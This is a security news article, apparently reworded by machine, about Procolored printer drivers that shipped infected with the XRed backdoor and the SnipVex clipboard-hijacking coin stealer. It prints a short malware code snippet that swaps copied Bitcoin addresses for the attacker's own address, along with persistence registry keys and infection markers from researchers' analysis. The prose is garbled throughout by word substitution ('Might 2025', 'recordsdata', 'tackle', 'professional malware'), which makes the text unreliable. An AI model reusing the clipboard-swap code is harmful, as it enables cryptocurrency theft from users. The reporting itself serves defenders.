Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Printer Company Offered Malicious Drivers Infected With XRed Malware

Posted on May 17, 2025May 17, 2025 By CWS

In a regarding cybersecurity incident, printer producer Procolored unknowingly distributed malware-infected software program for roughly six months, ending in Might 2025.

The problem got here to mild when YouTube creator Cameron Coward of the channel Serial Hobbyism tried to assessment a $6,000 UV printer and was alerted by his antivirus software program to infections on the company-provided USB drive.

What initially appeared as potential false positives was subsequently confirmed to be professional malware-a refined mixture of a backdoor and a cryptocurrency-stealing virus.

The contaminated software program packages, accessible for obtain from Procolored’s web site through mega.nz hyperlinks, contained malicious code affecting six printer merchandise: F8, F13, F13 Professional, V6, V11 Professional, and VF13 Professional.

When customers put in the drivers, their methods grew to become contaminated with two distinct malware strains: Win32.Backdoor.XRedRAT.A and MSIL.Trojan-Stealer.CoinStealer.H (known as SnipVex).

The infections affected a complete of 39 recordsdata throughout the assorted software program packages, with 20 distinctive file hashes recognized.

G DATA safety researchers recognized that the XRed backdoor part had beforehand been documented in February 2024, indicating this was not a brand new risk however somewhat an older malware pressure that had discovered its method into Procolored’s provide chain.

Evaluation revealed the backdoor contained the very same command and management URLs as variants analyzed earlier, regardless that these servers had already gone offline earlier than this incident gained consideration.

The affect of those infections prolonged past mere knowledge safety issues. Blockchain evaluation confirmed that the attackers’ Bitcoin tackle acquired roughly 9.3 BTC-equivalent to roughly $100,000-likely from hijacked cryptocurrency transactions.

Regardless of the command and management infrastructure being inactive since February 2024, limiting the backdoor’s performance, the file-infecting capabilities of SnipVex continued to pose vital dangers to affected methods.

An infection Mechanism of SnipVex

The SnipVex part employed a classy file an infection technique, working as a basic prepending virus.

Payload of SnipVex consists solely of eight strains (Supply – G DATA)

When analyzing the PrintExp.exe pattern (SHA256: 531d08606455898408672d88513b8a1ac284fdf1fe011019770801b7b46d5434), researchers discovered that the malware prepended itself to professional executable recordsdata.

The virus’s an infection routine was elegantly easy but efficient. It first checked goal recordsdata for an an infection marker-specifically the byte sequence 0x0A 0x0B 0x0C within the ultimate three bytes-to keep away from superinfection.

An infection routine of SnipVex (Supply – G DATA)

It then selectively averted infecting recordsdata in %TEMP% or %APPDATA% directories, in addition to any recordsdata beginning with a dot.

// SnipVex clipboard monitoring code
// Searches for Bitcoin tackle patterns and replaces them
if (Regex.IsMatch(clipboardText, “[13][a-km-zA-HJ-NP-Z1-9]{25,34}”))
{
Clipboard.SetText(“1BQZKqdp2CV3QV5nUEsqSg1ygegLmqRygj”);
}

To propagate, SnipVex monitored all logical drives for any adjustments to recordsdata with “.exe” extensions, making a persistent an infection vector throughout linked methods.

The virus established persistence by way of Home windows Registry run keys (HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunScdBcd and HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunClpBtcn), guaranteeing it remained energetic throughout system reboots.

Procolored has since eliminated all contaminated software program from their web site and issued remediation steerage to affected prospects, promising improved safety measures for future software program distributions.

How SOC Groups Save Time and Effort with ANY.RUN – Dwell webinar for SOC groups and managers

Cyber Security News Tags:Company, Drivers, Infected, Malicious, Malware, Offered, Printer, XRed

Post navigation

Previous Post: Guide to Cloud API Security
Next Post: New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads

Related Posts

UK Government Sets Timeline to Replace Passwords With Passkeys Cyber Security News
macOS Gatekeeper Explained: Strengthening System Defenses Cyber Security News
Critical Open Source Easyjson Library Under Full Control of Russian Company Cyber Security News
Adversarial Machine Learning – Securing AI Models Cyber Security News
Healthcare Sector Emerges as a Prime Target for Cyber Attacks in 2025 Cyber Security News
Android 16 Comes with Advanced Device-level Security Setting Protection for 3 Billion Devices Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • ChatGPT Vulnerability Lets Attackers Embed Malicious SVGs & Images in Shared Chats
  • Cybercrime-as-a-Service – Countering Accessible Hacking Tools
  • How to Remove Malware From Your PC
  • How to Recover From a Data Breach
  • BreachRx Lands $15 Million as Investors Bet on Breach-Workflow Software

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • May 2025

Recent Posts

  • ChatGPT Vulnerability Lets Attackers Embed Malicious SVGs & Images in Shared Chats
  • Cybercrime-as-a-Service – Countering Accessible Hacking Tools
  • How to Remove Malware From Your PC
  • How to Recover From a Data Breach
  • BreachRx Lands $15 Million as Investors Bet on Breach-Workflow Software

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News